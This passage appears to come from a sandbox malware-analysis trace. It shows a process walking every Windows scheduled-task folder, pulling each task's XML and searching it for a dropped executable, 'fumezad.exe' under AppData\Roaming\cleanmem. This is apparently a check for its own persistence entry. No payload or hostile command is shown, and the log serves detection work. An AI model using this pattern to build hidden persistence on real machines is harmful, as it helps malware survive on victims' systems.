D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.027] IUnknown:Release (This=0x127090) returned 0x0 [0138.027] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.027] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="UpdateRecordPath") returned 0x0 [0138.027] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.031] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.031] IUnknown:Release (This=0x127090) returned 0x0 [0138.031] IUnknown:Release (This=0x126f40) returned 0x0 [0138.031] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.037] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=1) returned 0x0 [0138.037] ITaskFolderCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24da60 | out: ppFolder=0x24da60*=0x1270a0) returned 0x0 [0138.037] ITaskFolder:GetTasks (in: This=0x1270a0, flags=1, ppTasks=0x24d8e0 | out: ppTasks=0x24d8e0*=0x1295a0) returned 0x0 [0138.038] IRegisteredTaskCollection:get_Count (in: This=0x1295a0, pCount=0x24da40 | out: pCount=0x24da40*=0) returned 0x0 [0138.038] IUnknown:Release (This=0x1295a0) returned 0x0 [0138.038] ITaskFolder:GetFolders (in: This=0x1270a0, flags=0, ppFolders=0x24d8e8 | out: ppFolders=0x24d8e8*=0x1295a0) returned 0x0 [0138.039] ITaskFolderCollection:get_Count (in: This=0x1295a0, pCount=0x24da58 | out: pCount=0x24da58*=0) returned 0x0 [0138.039] IUnknown:Release (This=0x1295a0) returned 0x0 [0138.039] TaskScheduler:IUnknown:Release (This=0x1270a0) returned 0x0 [0138.039] IUnknown:Release (This=0x126f40) returned 0x0 [0138.039] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.039] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.040] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.042] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.042] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.042] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="CorruptionDetector") returned 0x0 [0138.042] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0138.044] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.044] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.044] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.044] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="DecompressionFailureDetector") returned 0x0 [0138.044] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0138.046] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.047] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.047] IUnknown:Release (This=0x126f40) returned 0x0 [0138.047] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.048] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.048] IUnknown:Release (This=0x126f40) returned 0x0 [0138.048] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.048] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.048] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.049] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.049] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.049] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="HotStart") returned 0x0 [0138.049] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n") returned 0x0 [0138.051] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.051] IUnknown:Release (This=0x127080) returned 0x0 [0138.051] IUnknown:Release (This=0x126f30) returned 0x0 [0138.052] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.052] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.052] IUnknown:Release (This=0x126f30) returned 0x0 [0138.052] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.052] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.052] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.062] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.062] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127070) returned 0x0 [0138.062] IRegisteredTask:get_Name (in: This=0x127070, pName=0x24da80 | out: pName=0x24da80*="LPRemove") returned 0x0 [0138.062] IRegisteredTask:get_Xml (in: This=0x127070, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0138.064] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.064] IUnknown:Release (This=0x127070) returned 0x0 [0138.064] IUnknown:Release (This=0x126f30) returned 0x0 [0138.064] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.065] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.065] IUnknown:Release (This=0x126f30) returned 0x0 [0138.065] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.065] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.065] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.067] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.067] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.067] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="SystemSoundsService") returned 0x0 [0138.067] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0138.069] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.069] IUnknown:Release (This=0x127090) returned 0x0 [0138.069] IUnknown:Release (This=0x126f40) returned 0x0 [0138.069] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.070] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.070] IUnknown:Release (This=0x126f40) returned 0x0 [0138.070] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.070] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.070] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.071] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.071] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.071] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="GatherNetworkInfo") returned 0x0 [0138.071] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0138.073] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.073] IUnknown:Release (This=0x127080) returned 0x0 [0138.073] IUnknown:Release (This=0x126f30) returned 0x0 [0138.073] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.079] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.079] IUnknown:Release (This=0x126f30) returned 0x0 [0138.079] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.079] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.079] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.080] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0138.080] IUnknown:Release (This=0x126f50) returned 0x0 [0138.080] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.081] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.081] IUnknown:Release (This=0x126f50) returned 0x0 [0138.081] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.081] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.081] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.083] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.083] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.083] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="Background Synchronization") returned 0x0 [0138.083] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0138.086] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.086] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.086] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.086] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="Logon Synchronization") returned 0x0 [0138.086] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0138.088] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 